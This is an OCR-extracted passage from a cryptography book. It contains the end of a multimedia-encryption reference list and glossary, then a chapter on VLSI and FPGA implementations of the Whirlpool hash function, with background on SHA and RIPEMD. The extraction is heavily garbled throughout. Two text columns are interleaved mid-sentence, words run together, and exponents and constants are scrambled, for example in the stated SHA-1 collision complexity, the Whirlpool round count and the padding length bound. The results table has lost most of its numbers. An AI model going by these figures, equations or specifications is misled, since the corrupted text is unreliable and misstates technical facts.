Potlapally, N., Raghunathan, A., & Jha, N. (2003). Meta-fragile watermarking for wireless networks.
Analyzing the energy consumption of security In Proceedings of the International Conference of
protocols. In Proceedings of the 2003 International Communications, Circuits, and Systems.
Symposium on Low Power Electronics and Design,
Sridharan, S., Dawson, E., & Goldburg, B. (1991).
Seoul, Korea (pp. 30-35).
Fast Fourier transform based speech encryption
Raghunathan,A.Ravi, , S.Hattangady,
, S.Quis
&, - system. IEE Proceedings of Communications,
quater, J. (2003). Securing mobile appliances: New SpeechandVision,(3), 83 1 215-223.
challenges for the system designer. In Proceedings
Tang, L. (1996). Methods for encrypting and de-
of the 2003 Europe Conference and Exibition in
cryptingMPEGvideodataefficiently. In
Proceed-
Design, Automation and Test (pp. 176-181).
ings of the Fourth ACM International Multimedia
Rao, H., Chang, D., Chen, Y., & Chen, M. (2001). Conference ACM ( Multimedia’9, )6 Boston, MA
iMobile: A proxy-based platform for mobile (pp. 219-230).
services. In Proceedings of the Wireless Mobile
Tikkanen, K., Hannikainen, M., Hamalainen, T., &
Internet (pp. 3-10).
Saarinen, J. (2000). Hardware implementation of
Salkintzis, A., & Passas, N. (2005). Emerging the improved WEP and RC4 encryption algorithms
wireless multimedia: Services and technologies. for wireless terminals. In Proceedings of European
John Wiley & Sons. Signal Processing Conference (pp. 2289-2292).
Scopigno, R., & Belfiore, S. .)024( Image de - Tosun,A.Feng,
&, Efficient
.W.)02 ( multi-layer
compositionforselectiveencryption andexible
coding fl and encryption of MPEG video streams.
network services. In Proceedings of the IEEE IEEE International Conference on Multimedia
Globecom 2004, Dallas, TX. and Expo, 1, 119-122.
Servetti, A., & Martin, J. (2002a). Perception-based Tosun, A., & Feng, W. (2001a). Lightweight secu-
selective encryption of G. 729 speech. Proceedings rity mechanisms for wireless video transmission.
of IEEE ICASSP, 1, 621-624. In Proceedings of International Conference on
Information Technology: Coding and Computing,
Servetti, A., & Martin, J. (2002b). Perception-based
Las Vegas, NV (pp. 157-161).
selective encryption of compressed speech. IEEE
Transactions on Speech and Audio Processing, Tosun, A., & Feng, W. (2001b). On error preserving
10(8), 637-643. encryption algorithms for wireless video transmis-
sion. In Proceedings of the ACM International
Servetti, A., Testa, C., Carlos, J., & Martin, D.
Multimedia Conference and Exhibition. Ottawa,
(2003). Frequency-selective partial encryption of
Ontario, Canada (pp. 302-308). Elsevier Engineer-
compressed audio. Paper presented at the Inter-
ing Information Inc.
national Conference on Audio, Speech and Signal
Processing, Hong Kong. Wee, S., & Apostolopoulos, J. (2001). Secure scal-
able video streaming for wireless networks. In
Shi, C., & Bhargava, B. (1998a). A fast MPEG
Proceedings of the IEEE International Conference
video encryption algorithm. In Proceedings of the
on Acoustics, Speech, and Signal Processing, 4,
6th ACM International Multimedia Conference,
2049-2052.
Bristol, UK (pp. 81-88).

Wee, S., & Apostolopoulos, J. (2003). Secure kEy tErMs

scalable streaming and secure transcoding with
JPEG-2000. IEEE International Conference on Commutative Watermarking and Encryp-
Image Processing, 1, 205-208. tion: Commutative watermarking and encryption
is the watermarking-encryption pair that supports
Wen, J., Severa, M., Zeng, W., Luttrell, M. H., &
the exchange between the encryption algorithm and
WeiyinAJ..) 02 ( format-compliantconfigurable
the watermarking algorithm. Thus, the media data
encryption framework for access control of video.
can either be watermarked followed by encryption
IEEE Transactions on Circuits and Systems for
or be encrypted followed by watermarking.
VideoTechnology,2(1 6), 545-557.
Digital Watermarking: Digital watermarking
Wu, C., & Kuo, C. (2000). Fast encryption methods
is the technology to embed information into the
foraudiovisualdataconfidentiality. Proceedings
original data by modifying parts of the data. The
ofSPIE,,092 4 284-295.
produced data are still usable, from which the
Wu, C., & Kuo, C..) Efficient
1 02 ( multimedia information can be detected or extracted.
encryption via entropy codec design. Proceedings
Format Compliant Encryption: Format
of SPIE, 4314, 128-138.
compliant encryption is the multimedia encryp-
Wu, M., Trappe, W., Wang, Z., & Liu, K. (2004). tion method that keeps the format information
Collusion-resistantfingerprintingunchanged. formultimedia.In this method, the encrypted media
IEEE Signal Processing Magazine, 21(2), 15-27. data can be decoded or browsed by a general de-
coder or player.
Wu, Y. (2005). Linear combination collusion attack
anditsapplicationonananti-collusion - fingerprint
Joint Fingerprint Embedding and Decryp-
ing. In Proceedings of the IEEE International Con- tion: Jointfingerprintembeddinganddecryptionis
ference on Audio, Speech and Signal Processing thetechnologytoimplementfingerprintembedding
(ICASSP’0) 5 (pp. 13-16). and data decryption at the same time. The input is
the encrypted media copy, while the output is the
Zeng, W., Zhuang, X., & Lan, J. (2004). Network
decryptedmediacopywithauniquefingerprint,
friendly media security rationales, solutions, and
for example, the customer ID.
open issues. In Proceedings of the International
Conference on Image Processing (ICIP 2004) Partial Encryption: Partial encryption is
(pp. 565-568). the encryption method that encrypts only parts
of the original data while leaving the other parts
Zhao, H., Wang, Z., & Liu, K. (2005). Forensic
unchanged. In this method, traditional ciphers can
analysis of nonlinear collusion attacks for multi-
be used to encrypt the selected parts.
mediafingerprinting. IEEE Transactions on Image
Processing, 14(5), 646-661. Robust Watermarking: Robust watermarking
is the watermarking algorithm that can survive not
Zhu, B., Yuan, C., Wang, Y., & Li, S. (2005).
only such general operations such as compression,
ScalableprotectionforMPEG- 4finegranularity
addingnoise,filtering,A/DorD/Aconversion,and
scalability. IEEE Transactions on Multimedia,
so forth, but also such geometric attacks such as
7(2), 222-233.
rotation, scaling translation, shearing, and so forth.
It is often used in ownership protection.
Scalable Encryption: Scalable encryption is
the multimedia encryption method that keeps the
scalability of the progressive or scalable media
data. The scalable media data can be produced
by such codecs as JPEG2000, MPEG4, scalable
video coding (SVC), and so on.

Chapter XVII
System-on-Chip Design of
the Whirlpool Hash Function
Paris Kitsos
Hellenic Open University (HOU), Patras, Greece
AbstrAct
In this chapter, a system-on-chip design of the newest powerful standard in the hash families, named
Whirlpool, is presented. With more details an architecture and twoverylarge-scaleintegration(VLSI)
implementations are presented. The first implementation is suitable for high speed a
the second one is suitable for applications with constrained silicon area resources. The architecture
permits a wide variety of implementation tradeoffs. Different implementations have been introduced and
eachspecificapplicationcanchoosetheappropriatespeed-area,trade-offimplementat
mentations are examined and compared in the security level and in the performance by using hardware
terms. Whirlpool with RIPEMD, SHA-1, and SHA-2 hash functions are adopted by the International
Organization for Standardization (ISO/IEC, 2003) 10118-3 standard. The Whirlpool implementations
allow fast execution and effective substitution of any previous hash families’ implementations in any
cryptography application.
IntroductIon All the aforementioned applications have integrated

an authentication module including a hash function
Nowadays many financial and other electronic embedded in the system’s implementation.
transactions are grown exponentially and they play A hash function is a function that maps an input
an important role in our life. All these transactions of arbitrary length into a fixed number of output
have integrated data authentication processes. In bits, the hash value.
addition many applications like the public key One of the most widely used hash function
infrastructure (PKI) (Adams & Farrell, 1999; is RIPEMD (Dobbertin, Bosselaers, & Preneel,
National Institute of Standards and Technology 1996). These are two different RIPEMD versions
[NIST, 20 5=http:csrc.
/ nist.gov/publications/ the RIPEMD-128 and the RIPEMD-160, with
nistpubs/800-77/sp800-77pdf]) and many mobile similar design philosophy but different word length
communications include authentication services. of the produced message digest (128- and 160-bit,
System-on-Chip Design of the Whirlpool Hash Function
respectively). In August 2002, NIST announced the hardware architectures have been also presented.
updated Federal Information Processing Standard The first one (McLoone & McCanny,) 02is a
(FIPS 180-2), which has introduced another three high speed hardware architecture and the second
new hash functions referred to as SHA-2 (256, 384, one (Pramstaller, Rechberger, & Rijmen, 2006) is
512). In addition, the new European schemes for a compact field-programmablegate array
(FPGA)
signatures, integrity, and encryption (NESSIE) architecture and implementation of Whirlpool.
(2004), was responsible to introduce a hash func- Botharchitecturesareefficient - forspecificappl
tion with high security level. In February 2003, cations; analytical comparisons with the proposed
it was announced that the hash function included implementations will be given in the rest of this
in the NESSIE portfolio is Whirlpool (Barreto chapter. In addition, comparisons with other hash
& Rijmen, 2003). Finally, the most known hash families’ implementations (Ahmad & Shoba Das,
function is the secure hash algorithm-1 (SHA-1) 2005; Deepakumara, Heys, & Venkatesam, 2001;
( NIST, 951=http:/itl.nist.gov/fipspub/fip180 - Dominikus, 2002; Grembowski et al., 2002;
1.htm). However, some security problems have McLoone, McIvor, & Savage, 2005; Sklavos &
been raised as it has already (see Wang, Yin, & Koufopavlou, 2003, 2005; Yiakoumis, Papadoniko-
Yu, 2005) shown. This collision of SHA-1 can be lakis, Michail, Kakarountas, & Goutis, 2005); are
found with complexity less than 296 hash operations. provided. From the comparison results it is proven
Thisisthefirstattackonthefull08-step SHA-
that the 1
proposed implementation performs better
with complexity less than the 280 theoretical bound. and composes an effective substitution of any pre-
A collision in SHA-1 would cast doubt over the vious hash families’ such as MD5, RIPEMD-160,
future viability of any system that relies on SHA-1. SHA-1, SHA-2, and so forth, in all the cases.
Theresultwillcauseasignificantconfusion and
The organization of the chapter is the follow-
it will create reengineering of many systems, and ing: In the second section, fundamental for hash
incompatibility between new systems and old. In functions families, is presented. So, the (ISO/IEC)
addition, the National Security Agency (NSA) did standard
3 8- 1 0 1 firstisbrieflydescribedand - sec
not disclose the SHA-2 design criteria and also its ondlytheWhirlpoolhashfunctionspecifications
design philosophy is similar to the design of SHA-1 are defined. In the third section, the proposed
function. So, the attack against SHA-1 probably architecture and VLSI implementations are pre-
will have affected to the SHA-2 function. Also, sented. Implementation results and discussion
this issue stands for RIPEMD hash families. On (comparison with other works) are reported in the
the other hand, the internal structure of Whirlpool fourthsection.Finally,thefifthsectionconclude
is different from the structure of all the aforemen- this chapter.
tioned hash functions. So, Whirlpool function does
not suffer for that kind of problems and makes it a
very good choice for electronics applications. fundAMEntAls for HAsH
All the afore-mentioned hash functions are functIons
adopted by the International Organization for
Standardization (ISO, 2003) 10118-3 standard. In this section a brief description of the ISO/IEC
In this chapter, an architecture and two VLSI 10118-3 standard is presented. This standard speci-
implementations of the new hash function, Whirl- fiesdedicatedhashfunctions.Thehashfunctions
pool,areproposed.Thefirstimplementation - are basedissuit
on the iterative use of a round-function.
able for high speed applications while the second Sevendistinctroundfunctionsarespecified,givin
one is suitable for applications with constrained rise to distinct dedicated hash-functions. Six of
silicon area resources. themarebrieflydescribedandatlast,Whirlpool
The architecture and the implementations is described in details.
presentedherewerethefirstinscientificliterature
(Kitsos & Koufopavlou, 2004). Until then, two

Figure 1. The SHA-1 round function
X0 X1 X2 X3 X4
(befor e r o u n d i )
fi
5 +
S
Zi
S30 +
Ci
W
(after r o u n d i )
X0 X1 X2 X3 X4
dedicated Hash functions The algorithm for generation of message digest

is identical for SHA-256 and SHA-512 and only
In each SHA-1 round, a hash operation is performed the constants (Ci) and functions, ei and di that
thattakesasinputsfive-bit 23 variables, andbeen
they have twoused differs (the functions ei used
extra -bit23 words. The first one is the message by SHA-256 and functions di used by SHA-512),
schedule, Zi, which is provided by the padding unit, and hence, SHA-256 and SHA-512 are discussed
and the other word is a constant, Cipredefined
, by simultaneously. The diagram of the SHA-256 and
the standard. Figure 1 shows the diagram of the SHA-512 round function is depicted in Figure 2.
SHA-1 round function. When a message of any length <264 bits, for
The sequence of functions f 0, f1, ., f 97 is used in SHA-256, or <2128 bits, for SHA-512 is input, the
this round-function, where each function f i,0≤i hash functions SHA-256 and SHA-512 compute the
9takes
≤7 threewords X1, X2 and X3 as input and message digest. The message digest generated by
produces a single word as output. The operations SHA-256 and SHA-512 are 256 and 512 bits long,
5 30 respectively. The procedure consists of two stages,
S and S means circular left shift by 5-bit and
30-bit positions respectively. namely, preprocessing and hash computation. In
Figure2.TheSHA-256andSHA-512roundfunction
X0 X1 X2 X3 X4 X5 X6 X7
e 2 or d 2 e 1 or d 1 e 3 or d 3 +
Zi
e 0 or d 0 +
Ci
+
W1
W2
+
X0 X1 X2 X3 X4 X5 X6 X7

the preprocessing stage, the message is padded, &he round-function of RIPEMD-60 1 is de -

parsed into m-bit blocks and initialization values are scribed in terms of operations on 32-bit words. A
been set in order to hash computation. A message sequence of functions g0, g1, ., g97 is used in this
scheduler divides the m-bit block into 16 words and round-function, where each function gi, 0 ≤ i ≤
prepares a message schedule by passing one word 79, takes three words X1, X2 and X3 as input and
at a time. A series of hash values are generated produces a single word as output. Two sequences of
iteratively from functions, constants, and word constant words C0, C1, ., C97 and C’0, C’1, ., C’97 are
operationsandthefinalhashvalueis the
used message
in this round-function. Besides, two sequences
digest. SHA-256 requires 64 transformation steps of 80 shift-values are used in this round-function,
(round-functions) while SHA-512 requires 80 round where each shift-value is between 5 and 15. The
function transformations. diagram of the RIPEMD-160 round function is
SHA-384 uses exactly the same round func- illustrated in Figure 3.
tion as SHA-512 and requires 80 round function As Figure 4 shows, the round-function of
transformations. Only the initialization values are RIPEMD-128 is described in terms of operations
different. The 384-bit message digest is obtained on 32-bit words. A sequence of functions g0, g1,
by truncating the SHA-512-based hash output to ., g36 is used in this round-function, where each
its left-most 384-bit. function gi≤ 0 , itakes
,36 ≤ threewords X1, X2 and
RIPEMD-160 and RIPEMD-128 replaces the X3 as input and produces a single word as output.
previous published version of RIPEMD and over- Two sequences of constant words C0, C1, ., C36 and
comes the security problems that they have raised C’0, C’1, ., C’36 are used in this round-function.
(see Dobbertin, 1997). The main design principle of Two sequences of 64 shift-values are also used
bothhashfunctionsistomaximizetheconfidence in this round-function, where each shift-value is
gained by RIPEMD, but with as few changes as between 5 and 15.
possible to the original structure. The produced
message digest, ranges in length from 128- to 160- whirlpool Hash function
bit, depending on the selected hash function each Specifications
time. These hash functions enable the determina-
tion of a message’s integrity. Any change to the Whirlpool is a one-way, collision resistant 512-bit
message will, with a very high probability, result hash function operating on messages less than 2256
in a different produced message digest. bits in length. It consists of the iterated application
Figure3.TheRIPEMD-160roundfunction
X0 X1 X2 X3 X4
(befor e r o u n d i)
gi
Sti S10
+
W
(after r o u n d i )
X0 X1 X2 X3 X4

Figure 4. The RIPEMD-128 round function
X0 X1 X2 X3
(befor e r o u n d i)
gi
Zai
+
Ci
S ti
W
X0 X1 X2 X 3 (after r o u n d i)
of a compression function, based on an underlying The key addition N[k], consists of the bitwise
dedicated 512-bit block cipher that uses a 512-bit addition (XOR) of a key matrix k such as:
key. The Whirlpool is a Merkle hash function
(Menezes, Van Oorschot, & Vastone, 1997) based
[k ](a ) = b ⇔ bij = a ij ⊕ k ij , 0 ≤ i, j ≤ 7
on a 512-bit block cipher, W, using a chained 512-
bit key state, both derived from the input data. (2)
The round function, of the W, is operating in the
Miyaguchi-Preneel mode (Menezes et al.) as shown This mapping is also used to introduce round
in Figure 5. constants in the key schedule. The input data
As Figure 5 shows, a 512-bit data block, mi, (hash state) is internally viewed as a 8x8 matrix
with a 512-bit key, hi-1, is used for the operation over GF(28). Therefore, 512-bit data string must
of W block cipher. The output of the block cipher be mapped to and from this matrix format. This
with the original input data block and also with can be done by function : such as:
the input key are all together XORed in order to
produce the hash value, hi. This hash value is used (a) = b ⇔ bij = a 8i + j , 0 ≤ i, j ≤ 7 (3)
as a key in the next input data block.
In the rest of this chapter, the round function of The first transformation of the hash state i
theblockcipher,W,isdefined.Theblockdiagram through the non-linear layer 3 , which consists of the
of the W block cipher basic round is depicted in parallel application of a non-linear substitution S-
Figure 6. The round function, ! [k], is based on Box to all bytes of the argument individually. After,
combined operations from three algebraic func- the hash state is passed through the permutation
tions. These functions are the non-linear layer 3 , that cyclical shifts each column of its argument
the cyclical permutation , and the linear diffusion independently, so that column j is shifted down-
layer 6 . So, the round function is the composite wards by j positions. The final transformation is
mapping ! [k], parameterized by the key matrix k, the linear diffusion layer 6 , which the hash state is
and given by the following equation. multiplied with a generator matrix. The effect of 6
is the mix of the bytes in each state row.
[k ] ≡ [k ]    (1) So, the dedicated 512-bit block cipher W[K],
parameterized by the 512-bit cipher key K, is
definedas:
Symbol “  ” denotes the sequential opera-
tion of each algebraic function where the right
functionisexecutedfirst.
W [K ] = (O 1
r=R
)
[Κ r ]  [Κ 0 ]
(4)
0
Figure5.Whirlpoolhashfunction cojr ≡ S [8(r − 1) + j ], 0 ≤ j ≤ 7,

mi cijr ≡ 0, 1 ≤ i ≤ 7, 0 ≤ j ≤ 7
512
(6)
h i-1
512
W block cipher So, the Whirlpool iterates the Miyaguachi-
Preneel hashing scheme over the t padded blocks
512 mi, 1 ≤ i ≤ t , using the dedicated 512-bit block
cipher W:
XOR
512 ni = (mi ),
hi H 0 = ( IV ),
H i = W [ H i −1 ](ni ) ⊕ H i −1 ⊕ ni , 1 ≤ i ≤ t
where, the round keys K0,…, K R are derived from (7)
K by the key schedule. The default number of
rounds is R=1.0 The key schedule expands the where, IV (the Initialization Vector) is a string of
512-bit cipher key K onto a sequence of round 512 0-bits.
keys K0,…, K R as: As Equations 4 and 5 show the internal block
cipher W, comprises of a data randomizing part
and a key schedule part. These parts consist of the
K0 = K same round function.
r −1
K = [c ]( K ), r > 0
r r
(5) Before being subjected to the hashing operation,
a message M of bit length L<2652 is padded with a
The round constant for the r-th round, r>0, is a 1-bit, then as few 0-bits as necessary to obtain a
matrix c definedbysubstitutionboxS-( Box)bit
r
as:string whose length is an odd multiple of 256,
Figure6.BlockdiagramoftheWbasicroundwithalgebraicfunctionstransformations
Input
I n p u t S tate O u tp u t S tate
512
s 0, 0 s 0, 1 s 0, 6 s 0, 7 s ’0, 0 s ’0, 1 s ’0, 6 s ’0, 7
s 1, 0 s 1, 7 s ’1, 0 s ’1, 7
non-linear layer
s 6, 0 s 6, 7 s ’6, 0 s ’6, 7
I n p u t S tate O u tp u t S tate s 7, 0 s 7, 1 s 7, 6 s 7, 7 s ’7, 0 s ’7, 1 s ’7, 6 s ’7, 7
512
s 0, 0 s 0, 1 s 0, 6 s 0, 7 s 0, 0 s 7, 1 s 2, 6 s 1, 7
s 1, 0 s 1, 7 s 1, 0 s 2, 7
permutation
s 6, 0 s 6, 7 s 6, 0 s 7, 7
s 7, 0 s 7, 1 s 7, 6 s 7, 7 s 7, 0 s 6 , 1 s 1, 6 s 0, 7
512
s 0, 0 s 0, 1 s 0, 6 s 0, 7 s ’0, 0 s ’0, 1 s ’0, 6 s ’0, 7
s 1, 0 s 1, 7 s ’1, 0 s ’1, 7
diffusion layer
s 6, 0 s 6, 7 s ’6, 0 s ’6, 7
512 s 7, 0 s 7, 1 s 7, 6 s 7, 7 s ’7, 0 s ’7, 1 s ’7, 6 s ’7, 7
s 0, 0 s 0, 1 s 0, 6 s 0, 7 s ’0, 0 s ’0, 1 s ’0, 6 s ’0, 7

k]
s 1, 0 s 1, 7 s ’1, 0 s ’1, 7
xo r R ou n d K ey
512
s 6, 0 s 6, 7 s ’6, 0 s ’6, 7 512
s 7, 0 s 7, 1 s 7, 6 s 7, 7 s ’7, 0 s ’7, 1 s ’7, 6 s ’7, 7
O u tp u t
k 7, 0 k 7, 1 k 7, 2 k 7, 3 k 7, 4 k 7, 5 k 7, 6 k 7, 7

Figure 7. Whirlpool hash function architecture function is shown in Figure 7. The Pad Component
pads the input data and converts them to n-bit
M essage n padded message. In the proposed architecture an
256 interface with 256-bit input for Message is con-
sidered. The input n, specifies the total length of
P ad C om pone nt
the message. The padded message is partitioned
mi
512 H t-1 into a sequence of t 512-bit blocks m1, m2, … , mt.
This sequence is then used in order to generate a
new sequence of 512-bit string, H1, H2, … , Ht in
W
the following way. mi is processed with Hi-1 as key,
and the resulting string is XORed with mi in order
to produce the Hi. H0 is a string of 512 0-bits and
W o ut
Ht is the hash value.
XOR
The block cipher W, is mainly consists of the
512
round function !. The implementation of the round
Ht function ! is illustrated in Figure 8.
The non-linear layer 3 , is composed of 64 sub-
stitution tables (S-Boxes). The internal structure of
theS-BoxisshowninFigureIt .8 consistsoffive
andfinallywiththe65-2bitright-justified 4-bitbinary -1
mini boxes E, E , and R. These mini boxes
representation of L, resulting in the padded message can be implemented either by using look-ip-tables
m, partitioned in t blocks m1, m2, ... , mt. (LUTs) or Boolean expressions. Next, the cyclical
permutation , is implemented by using combina-
tional shifters. These shifters are cyclically shift (in
wHIrlPool ArcHItEcturEs And downwards)eachmatrixcolumnbyafixednumber
vlsI IMPlEMEntAtIons (equal to j), in one clock cycle. The linear diffusion
layer 6 , is a matrix multiplication between the hash
In this paragraph the proposed architecture and state and a generator matrix. In Barreto and Rijmen
implementations are explained in detail of the an
) 302 ( efficientmethodisprovidedinorderto
hash function Whirlpool. A general diagram of implement the matrix multiplication. However, in
the architecture that performs the Whirlpool hash this chapter an alternative way is proposed which
Equation 8.
bi 0 = ai 0 ⊕ ai1 ⊕ ai 3 ⊕ ai 5 ⊕ ai 7 ⊕ X [ai 2 ] ⊕ X 2 [ai 3 ⊕ ai 6 ] ⊕ X 3[ai1 ⊕ ai 4 ]
bi1 = ai 0 ⊕ ai1 ⊕ ai 2 ⊕ ai 4 ⊕ ai 6 ⊕ X [ai 3 ] ⊕ X 2 [ai 4 ⊕ ai 7 ] ⊕ X 3[ai 2 ⊕ ai 5 ]
bi 2 = ai1 ⊕ ai 2 ⊕ ai3 ⊕ ai 5 ⊕ ai 7 ⊕ X [ai 4 ] ⊕ X 2 [ai5 ⊕ ai 0 ] ⊕ X 3[ai3 ⊕ ai 6 ]
bi 3 = ai 0 ⊕ ai 2 ⊕ ai 3 ⊕ ai 4 ⊕ ai 6 ⊕ X [ai5 ] ⊕ X 2 [ai 6 ⊕ ai1 ] ⊕ X 3[ai 4 ⊕ ai 7 ]
bi 4 = ai1 ⊕ ai3 ⊕ ai 4 ⊕ ai 5 ⊕ ai 7 ⊕ X [ai 6 ] ⊕ X 2 [ai 7 ⊕ ai 2 ] ⊕ X 3[ai 5 ⊕ ai 0 ]
bi 5 = ai 0 ⊕ ai 2 ⊕ ai 4 ⊕ ai 5 ⊕ ai 6 ⊕ X [ai 7 ] ⊕ X 2 [ai 0 ⊕ ai 3 ] ⊕ X 3[ai 6 ⊕ ai1 ]
bi 6 = ai1 ⊕ ai 3 ⊕ ai 5 ⊕ ai 6 ⊕ ai 7 ⊕ X [ai 0 ] ⊕ X 2 [ai1 ⊕ ai 4 ] ⊕ X 3[ai 7 ⊕ ai 2 ]
bi 7 = ai 0 ⊕ ai 2 ⊕ ai 4 ⊕ ai 6 ⊕ ai 7 ⊕ X [ai1 ] ⊕ X 2 [ai 2 ⊕ ai 5 ] ⊕ X 3[ai 0 ⊕ ai 3 ]

Figure8.Implementationoftheroundfunction!
E E -1
In p u t
512
R
S S S
64
512
E E -1
a i1 xor a i4 a i3 xor a i6 a i2 a i0 xor a i1 xor a i3 xor a i5 xor a i7

512
X3 X2 X
R ou n d 512
K ey
xo r [k ] b i0
512
512
O u tp u t
is suitable for hardware implementation. The bitwise XORed with the cr constant. A round key
transformation expressions of the diffusion layer is produced, on the y,fl in one clock cycle. Each
are given next. (See Equation 8.) produced round key is used in the next clock cycle
Bytes bi0, bi1, bi2,… , bi7 represent the eight (through the multiplexer) for the production of the
bytes of the i row of the output of the layer 6 hash next round key. In the data randomizing data path,
state. Table X implements the multiplication by the hash state of the 6 layer is bitwise XORed with
the polynomial g(x)= x modulo (x8x+ 4x+ 3x+ 2+1 ) the appropriate round key. After, the intermediate
in GF(28). Table X2 is defined as X2 ≡X X feedback data are used as input to the next round
and X3 as X 3 ≡ X  X  X . In Figure 8, the (through the multiplexer). After 10 execution rounds
implementation of the output byte bi0 is depicted the Output Register latches the temp value. This
in details. The other bytes are implemented in a is bitwise XORed with the Hi-1 value in order to
similar way. The key addition (N[k]) consists of compute the Wout.
eight 2-input XOR gates for any byte of the hash In a clock cycle, one execution round is executed
state. Every bit of the round key is XORed with and, simultaneously, the appropriate round key
the appropriate bit of the hash state. is calculated. The system needs 10 clock cycles
Thefirstimplementationisdepicted in
per Figure
block. If .another
9 block mi+1 is required to be
This implementation has two similar parallel data transformed, the previous process is repeated (by
paths, the data randomizing and the key schedule. using as cipher key the Hi value). So, for t blocks
The implementation details of the non-linear layer the execution time is 10*t clock cycles.
3 , the cyclical permutation , and the linear dif- The second implementation of the W block
fusion layer 6 are shown in Figure 8. The input cipher architecture is shown in Figure 10. This
block mi is set to the Input data simultaneously implementation is suitable for applications with
with the initial vector (IV ) to the Key. In the key constrained silicon area resources. The appropri-
schedule data path, the output data of the 6 layer is ate key schedule part is integrated with the data

Figure9.TheimplementationoftheWblockciphersuitableforhighspeedapplicati
In p u t d ata K ey
512 512
512 512
M ux M ux
In p u t In p u t
R eg ister R eg ister
[k ] XOR [k ] XOR
ROM
(c r )
512 512
512
512
feed b ack d ata
feed b ack d ata
r
O u tp u t 1 < = r< = 1 0
R eg ister
te m p
XOR H i-1
512
512
W o ut
randomizing part in order to reduce the required key, which is stored in the RAM. After 10 execution
hardware resources. The execution of the W block rounds the Output Register latches the temp result.
cipher on this implementation is performed in two This result is bitwise XORed with the Hi-1 value (in
phases.Inthefirstphase,theround - keys are
this casepro
is equal to the IV) in order to compute the
duced and stored in the RAM. In the second phase, Wout. The Wout is XORed with the misee ( figure,7)
thehashvalueiscomputed.Thealgorithm sospecifies
thefinal,hashvalue Hi, is computed.
10 rounds for the hash state. The Input data is the If another block mi+1 is required to be trans-
initialization vector (IV ), in order to produce the formed, the previous process is repeated (by using
roundkeysfirst ( phase) The
.
Input Register is used as cipher key the Hi value). So, for t blocks the
for buffering the algorithm Input data. The output execution time is 20*t clock cycles. This has a
data of the 6 layer is bitwise XORed with the cr result the total throughput of this implementation
constant. Each execution round lasts one clock is half than the first implementation; however i
cycle.Afterthefirstexecutionround,the first
needs round
almost half silicon area.
key is stored in the RAM. It is used as input in the
second execution round, through the multiplexer
(feedback data), for the production of the second IMPlEMEntAtIon rEsults And
round key. This process is repeated 10 times (10 dIscussIon
execution rounds) and lasts 10 clock cycles. The
crconstantsarepredefinedandROM. stored inVIRTEX
The the FPGA device used in order to evalu-
Themultiplexerselectsduringthe cr first phase the of the proposed implementa-
ate the performance
constants, and during the second phase the round tions. Especially the XC4VLX100 device is used;
keys. The computation of the hash value is taking this device belongs to a new family manufactured
place during the second phase. In this phase, the in 1.2 volts, 90nm triple-oxide technology and
Input data is the mi block. The output data of the 6 offers twice the performance, twice the density,
layer is bitwise XORed with the appropriate round and less than one-half the power consumption of

Figure 10. The implementation of the W block clock management, and digital signal process-
cipher suitable for applications with con- ing. In Figure 11 the DSP48 slice architecture is
strained silicon area resources depicted. The Virtex-4 DSP slices are organized
as vertical DSP columns. Within the DSP column,
In p u t d ata
two vertical DSP slices are combined with extra
512
512 logic and routing to form a DSP tile. The DSP tile
M ux is four CLBs tall. Each DSP48 slice has a two-input
multiplier followed by multiplexers and a three-
In p u t
R eg ister
input adder/subtractor. The multiplier accepts two
18-bit, two’s complement operands producing a
36-bit, two’s complement result. The result is a
sign extended to 48 bits that can optionally be fed
to the adder/subtractor. The adder/subtractor ac-
cepts three 48-bit, two’s complement operands, and
ROM
M 512
(c r ) produces a 48-bit two’s complement result. Higher
[k ] XOR u level DSP functions are supported by cascading
512 x
512 512 individual DSP48 slices in a DSP48 column. One
RAM
feed b ack d ata input (cascade B input bus) and the DSP48 slice
512
r
output (cascade P output bus) provide the cascade
O u tp u t
R eg ister
capability.
te m p The XC4VLX100 device used in this chapter
XOR H i-1 contains 96 DSP48 slices.
512
512 Each one of the proposed implementations was
W o ut
captured by using VHSIC hardware description
language (VHDL), with structural description
logic. Both implementations were simulated to
previous-generation devices. The basic building operating correctly by using the test vectors which
block of these devices is the DSP48 slice (see are provided by the NESSIE submission package
Xilinx, 2006). The purpose of this module is to (NESSIE, 2004), and the ISO/IEC 10118-3 standard
deliver off-the-shelf programmable devices with (ISO, 2003). Parts of the proposed implementations
the best mix of logic, memory, I/O, processors, were designed by using two alternative techniques.
Figure 11. The DSP48 slice architecture

c a s c a de o ut to n e x t s lic e
bcout Pc o u t
18
18
36 48
18 36
x
48
18
A c In
72
x
18 36
b 48
48 y +/- P
z Er o 48
s ubtrAct
48
c 48
z
48 18
48
48
b c In w ire s hift r ight b y 1 7 -bit
Pc In
c a s c a de In from P re v ious s lic e

Table 1. Performance analysis measurements
frequency throughput throughput /

Implementation fPgA device slices / brAM
(MHz) (Mbps) slices
In Mcloone et al. (2005)
XCVLX00 0 / 0 . 0.
unroll x 2
In Mcloone et al. (2005)
XCVLX00 / 0 0.
Iterative
In Pramstaller et al.
XCVP0 / 0 0.
(2006)
Author 1st_impl_bb XCVLX00 0 / 0 0 .0
Author 1st_impl_lb XCVLX00 / 0 .
Author 2nd_impl _bb XCVLX00 / 0 00 .0
Author 2nd_impl _lb XCVLX00 / 0 0 .
The 4-bit mini boxes (E, E-1, and R) were designed the LB implementation throughput is 17.2 Gbps at
by using LUTs and Boolean expressions. The usage 337 MHz. The 2nd implementation was designed
of FPGA-LUTs does not increase the algorithm in order to support applications with area restrict
execution latency. Besides, the LUTs are imple- requirements. It demands 20 clock cycles for each
mented by using function generators. So, for the data block and requires less hardware resources.
implementation of the Whirlpool hash function The BB implementation throughput is 7 Gbps at 275
four alternative solutions are proposed. MHz clock frequency and the LB implementation
Two performance metrics are considered: throughput is 8 Gb/s at 313 MHz.
the area utilized and the throughput achieved by In McLoone et al. (2005) two Whirlpool hash
the implementations. The measurements of the hardware implementations are presented. In the
performance analysis are shown in Table 1. And first one, two rounds of the block cipher
W are
also, comparisons with other Whirlpool hash unrolled and during one clock cycle two rounds
hardware implementations (McLoone et al., 2005; are performed. This method reduces the overall
Pramstaller et al., 2006) are given. We symbolized latency of the design, but it will also result in a
as Boolean expressions based (BB) the mini boxes reduction in frequency. In order to compute the
implementations by using Boolean expressions, and final hash output needs to be iterated five time
as LUT based (LB) the mini boxes implementations This implementation achieves a throughput equal to
by using FPGA-LUTs. 4896 Mbps at 47.8 MHz. The second one is iterative
Both implementations (1st and 2nd) were implementations with algorithmic latency equal to
realized by the same FPGA device. The algo- 10 clock cycles. The major difference with previous
rithm constants (cr) are stored in a ROM which is and also with author implementations is that use
implemented by using LUT. The 2nd implementa- BRAM in order to implement the S-boxes. The
